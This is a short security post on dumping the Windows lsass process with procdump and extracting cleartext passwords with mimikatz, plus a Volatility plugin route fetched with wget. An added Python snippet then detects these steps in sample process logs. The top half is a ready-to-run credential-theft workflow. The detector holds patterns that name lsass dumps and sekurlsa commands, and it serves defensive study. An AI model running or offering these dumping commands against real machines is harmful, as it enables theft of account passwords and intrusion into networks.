Using Mimikatz to get cleartext passwords from an offline memory dump

# For 32 bits
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# For 64 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full

The same can be done with Volatility and the mimikatz plugin:

  1. cd /usr/share/volatility
  2. mkdir plugins
  3. cd plugins
  4. wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py
  5. apt-get install python-crypto
  6. volatility --plugins=/usr/share/volatility/plugins --profile=Win7SP0x86 -f halomar.dmp mimikatz
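
On the defensive side, the commands above leave recognisable process-creation command lines. The following is an added example, not part of the original post: it flags a full dump (-ma) aimed at lsass and sekurlsa commands passed as arguments. The log records are constructed samples and the rule names are made up for illustration.

```python
import re

# Splits a Windows command line into tokens, keeping "quoted strings" whole.
TOKEN_RE = re.compile(r'"[^"]*"|\S+')

# Constructed process-creation records (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", r"C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp"),
    ("WS01", r"C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp"),
    ("WS02", r"C:\tools\procdump.exe -accepteula -ma notepad.exe note.dmp"),
    ("WS03", r'mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"'),
    ("WS04", r"C:\Windows\System32\lsass.exe"),
]


def classify(cmdline):
    """Return the list of rule names that a single command line triggers."""
    tokens = [t.strip('"').lower() for t in TOKEN_RE.findall(cmdline)]
    hits = []

    # Rule 1: the full-dump switch (-ma) followed by lsass as the target process.
    # Matching is on the arguments, so a benign dump of another process is ignored.
    if "-ma" in tokens:
        targets = tokens[tokens.index("-ma") + 1:]
        if any(t.rsplit("\\", 1)[-1] in ("lsass", "lsass.exe") for t in targets):
            hits.append("lsass_full_dump")

    # Rule 2: sekurlsa module commands passed as command-line arguments.
    modules = sorted({t.split()[0] for t in tokens if t.startswith("sekurlsa::")})
    hits.extend(modules)
    return hits


def scan(events):
    """Return (host, hits) for every event that triggers at least one rule."""
    return [(host, classify(cmd)) for host, cmd in events if classify(cmd)]


if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS):
        print(host, hits)
```

Commands typed at the interactive mimikatz prompt do not appear in process-creation logs, so the first rule (the dump step) is the one to rely on for the workflow shown here.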

AliBawazeEer
